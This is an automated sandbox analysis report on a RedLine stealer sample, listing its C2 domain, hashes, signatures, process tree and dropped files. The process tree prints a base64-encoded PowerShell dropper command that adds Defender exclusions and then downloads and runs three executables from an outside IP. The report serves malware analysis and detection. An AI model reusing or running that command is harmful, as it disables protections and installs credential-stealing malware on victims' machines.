Resubmissions

19-08-2022 18:19

220819-wx8l9aghap 10

19-08-2022 18:17

220819-wwzyqagghn 10

19-08-2022 18:15

220819-wvz74abea4 10

Analysis

  • max time kernel
    25s
  • max time network
    28s
  • platform
    windows10-1703_x64
  • resource
    win10-20220812-en
  • resource tags

    arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
  • submitted
    19-08-2022 18:15

General

  • Target

    1111.exe

  • Size

    6KB

  • MD5

    cad36ced89b961355a57fc8acedfe557

  • SHA1

    5b020db088ef17cebb57ba77fd9427414d292f36

  • SHA256

    08b2434fa33b35c428fb85e938fed0d6d715b5e46806bbe2d130ebb0ed2df614

  • SHA512

    760c977a6835479956d8f1f74dd3f6d10557bb66c57d990243a4fa94d4d5845ad9b31d069660702aab40adceed5525e3c65613663ee442899fa43005b4bf52db

Malware Config

Extracted

Family

redline

Botnet

1877

C2

overthinker1877.duckdns.org:60732

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1111.exe
    "C:\Users\Admin\AppData\Local\Temp\1111.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2960
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAYwBmACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdwB0AHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABwAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBpAHQAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADMALgA5ADAALgAxADIAOAAuADIANQAzAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHMAdgBzAGgAbwBzAHQAcwAuAGUAeABlACcALAAgADwAIwB5AGcAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHEAYQBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHAAbQB5ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHMAdgBzAGgAbwBzAHQAcwAuAGUAeABlACcAKQApADwAIwBmAG0AawAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQAzAC4AOQAwAC4AMQAyADgALgAyADUAMwAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBzAHYAYwBoAG8AcwB0AHMALgBlAHgAZQAnACwAIAA8ACMAdwBoAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBhAGkAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBuAG4AZAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBzAHYAYwBoAG8AcwB0AHMALgBlAHgAZQAnACkAKQA8ACMAYwBoAG4AIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvADEAMwAuADkAMAAuADEAMgA4AC4AMgA1ADMALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AcwB2AGMAaABvAHMAdAAuAGUAeABlACcALAAgADwAIwB0AHAAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGEAdAB4ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGQAcQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAnACkAKQA8ACMAdQBwAGkAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZAB0AGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAG4AagB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHMAdgBzAGgAbwBzAHQAcwAuAGUAeABlACcAKQA8ACMAcwBlAHcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAagBlAHQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHkAZwBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHMAdgBjAGgAbwBzAHQAcwAuAGUAeABlACcAKQA8ACMAagBrAGQAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZwBjAHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHgAcQBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAnACkAPAAjAGsAYgB6ACMAPgA="
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3152
      • C:\Users\Admin\AppData\Local\Temp\svshosts.exe
        "C:\Users\Admin\AppData\Local\Temp\svshosts.exe"
        3⤵
        • Executes dropped EXE
        PID:2492
      • C:\Users\Admin\AppData\Local\Temp\svchosts.exe
        "C:\Users\Admin\AppData\Local\Temp\svchosts.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:4484
      • C:\Users\Admin\AppData\Local\Temp\svchost.exe
        "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        3⤵
        • Executes dropped EXE
        PID:4860

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\svchost.exe
    Filesize

    14KB

    MD5

    1937d5a853734874a0ef18d4acc43113

    SHA1

    37c4f8d0c6fea50f836c0a308b06de910205189a

    SHA256

    88e6238b9329ac7eca5ff20016f896c4869760a44e2da20cfd070bf83db52d64

    SHA512

    e43cbf94a70683649ac126a68d37f0d69bb581864e5e1a6076f9a09e2a3a89f88b436d3ef41300af873ea1fc70f3fdb75fe69288bcf5c17ef100b4b802478a28

  • C:\Users\Admin\AppData\Local\Temp\svchost.exe
    Filesize

    14KB

    MD5

    1937d5a853734874a0ef18d4acc43113

    SHA1

    37c4f8d0c6fea50f836c0a308b06de910205189a

    SHA256

    88e6238b9329ac7eca5ff20016f896c4869760a44e2da20cfd070bf83db52d64

    SHA512

    e43cbf94a70683649ac126a68d37f0d69bb581864e5e1a6076f9a09e2a3a89f88b436d3ef41300af873ea1fc70f3fdb75fe69288bcf5c17ef100b4b802478a28

  • C:\Users\Admin\AppData\Local\Temp\svchosts.exe
    Filesize

    205KB

    MD5

    b3503746bb7f1d30755c9f4a26ce0a2c

    SHA1

    2490c2a6b3fad0711993c8bb16aab2d21cefac6f

    SHA256

    90706da9b2d8dca13b4823cb9b6c95bde3df92ac336826722b33cfe495d2e300

    SHA512

    142841d0e5a51212af7f7ae6cd083eb5daa2e5542f3c8294524ff8c722a4dcbe8462bf647f928ba3b3edb4d36638a4be5a83ad5762e9b8e66429f6006901b72c

  • C:\Users\Admin\AppData\Local\Temp\svchosts.exe
    Filesize

    205KB

    MD5

    b3503746bb7f1d30755c9f4a26ce0a2c

    SHA1

    2490c2a6b3fad0711993c8bb16aab2d21cefac6f

    SHA256

    90706da9b2d8dca13b4823cb9b6c95bde3df92ac336826722b33cfe495d2e300

    SHA512

    142841d0e5a51212af7f7ae6cd083eb5daa2e5542f3c8294524ff8c722a4dcbe8462bf647f928ba3b3edb4d36638a4be5a83ad5762e9b8e66429f6006901b72c

  • C:\Users\Admin\AppData\Local\Temp\svshosts.exe
    Filesize

    161KB

    MD5

    36b190e42e0322b838447fb46098e162

    SHA1

    ab3e9669f8e50f68e4086943be05b0de245f8b16

    SHA256

    1812d5a1466bca0681c49479e7f026d48d6c3dbb5c2a082f288eb4f4578670c4

    SHA512

    3080d6bd06ce32140ffa5baf5a3c08d0eb8debe0e5cd6904ade61a783c82537e912a62c925867ed860691626d0a217d6ff7b98a8c42078ff4faba35409f25e4b

  • C:\Users\Admin\AppData\Local\Temp\svshosts.exe
    Filesize

    161KB

    MD5

    36b190e42e0322b838447fb46098e162

    SHA1

    ab3e9669f8e50f68e4086943be05b0de245f8b16

    SHA256

    1812d5a1466bca0681c49479e7f026d48d6c3dbb5c2a082f288eb4f4578670c4

    SHA512

    3080d6bd06ce32140ffa5baf5a3c08d0eb8debe0e5cd6904ade61a783c82537e912a62c925867ed860691626d0a217d6ff7b98a8c42078ff4faba35409f25e4b

  • memory/2492-508-0x0000000000000000-mapping.dmp
  • memory/2492-527-0x0000000000400000-0x000000000043E000-memory.dmp
    Filesize

    248KB

  • memory/2960-135-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-140-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-121-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-122-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-123-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-124-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-125-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-126-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-127-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-129-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-128-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-130-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-131-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-132-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-133-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-134-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-119-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-136-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-137-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-138-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-139-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-120-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-141-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-142-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-143-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-144-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-145-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-146-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-147-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-148-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-149-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-150-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-151-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-152-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-153-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-154-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-155-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-156-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-157-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-158-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-118-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-117-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/2960-116-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/3152-162-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/3152-225-0x00000000078E0000-0x00000000078FC000-memory.dmp
    Filesize

    112KB

  • memory/3152-164-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/3152-165-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/3152-166-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/3152-167-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/3152-168-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/3152-170-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/3152-171-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/3152-172-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/3152-173-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/3152-169-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/3152-174-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/3152-175-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/3152-176-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/3152-177-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/3152-178-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/3152-179-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/3152-180-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/3152-195-0x0000000004A40000-0x0000000004A76000-memory.dmp
    Filesize

    216KB

  • memory/3152-200-0x0000000007290000-0x00000000078B8000-memory.dmp
    Filesize

    6.2MB

  • memory/3152-218-0x0000000007190000-0x00000000071B2000-memory.dmp
    Filesize

    136KB

  • memory/3152-220-0x00000000079A0000-0x0000000007A06000-memory.dmp
    Filesize

    408KB

  • memory/3152-221-0x0000000007B10000-0x0000000007B76000-memory.dmp
    Filesize

    408KB

  • memory/3152-222-0x0000000007B80000-0x0000000007ED0000-memory.dmp
    Filesize

    3.3MB

  • memory/3152-163-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/3152-226-0x0000000008270000-0x00000000082BB000-memory.dmp
    Filesize

    300KB

  • memory/3152-230-0x00000000082C0000-0x0000000008336000-memory.dmp
    Filesize

    472KB

  • memory/3152-243-0x0000000009310000-0x0000000009343000-memory.dmp
    Filesize

    204KB

  • memory/3152-244-0x00000000092F0000-0x000000000930E000-memory.dmp
    Filesize

    120KB

  • memory/3152-253-0x0000000009350000-0x00000000093F5000-memory.dmp
    Filesize

    660KB

  • memory/3152-257-0x0000000009600000-0x0000000009694000-memory.dmp
    Filesize

    592KB

  • memory/3152-460-0x00000000095B0000-0x00000000095CA000-memory.dmp
    Filesize

    104KB

  • memory/3152-465-0x00000000095A0000-0x00000000095A8000-memory.dmp
    Filesize

    32KB

  • memory/3152-479-0x0000000009D20000-0x000000000A398000-memory.dmp
    Filesize

    6.5MB

  • memory/3152-480-0x00000000096A0000-0x00000000096BA000-memory.dmp
    Filesize

    104KB

  • memory/3152-485-0x0000000009730000-0x0000000009752000-memory.dmp
    Filesize

    136KB

  • memory/3152-486-0x000000000A3A0000-0x000000000A89E000-memory.dmp
    Filesize

    5.0MB

  • memory/3152-160-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/3152-161-0x0000000077600000-0x000000007778E000-memory.dmp
    Filesize

    1.6MB

  • memory/3152-159-0x0000000000000000-mapping.dmp
  • memory/4484-518-0x0000000000000000-mapping.dmp
  • memory/4484-623-0x0000000000760000-0x0000000000798000-memory.dmp
    Filesize

    224KB

  • memory/4484-630-0x0000000005580000-0x0000000005B86000-memory.dmp
    Filesize

    6.0MB

  • memory/4484-633-0x0000000004FA0000-0x0000000004FB2000-memory.dmp
    Filesize

    72KB

  • memory/4484-640-0x0000000005000000-0x000000000503E000-memory.dmp
    Filesize

    248KB

  • memory/4484-650-0x0000000005040000-0x000000000508B000-memory.dmp
    Filesize

    300KB

  • memory/4484-652-0x00000000052A0000-0x00000000053AA000-memory.dmp
    Filesize

    1.0MB

  • memory/4860-534-0x0000000000000000-mapping.dmp
  • memory/4860-613-0x0000000000D90000-0x0000000000D9A000-memory.dmp
    Filesize

    40KB

  • memory/4860-636-0x0000000006060000-0x00000000060F2000-memory.dmp
    Filesize

    584KB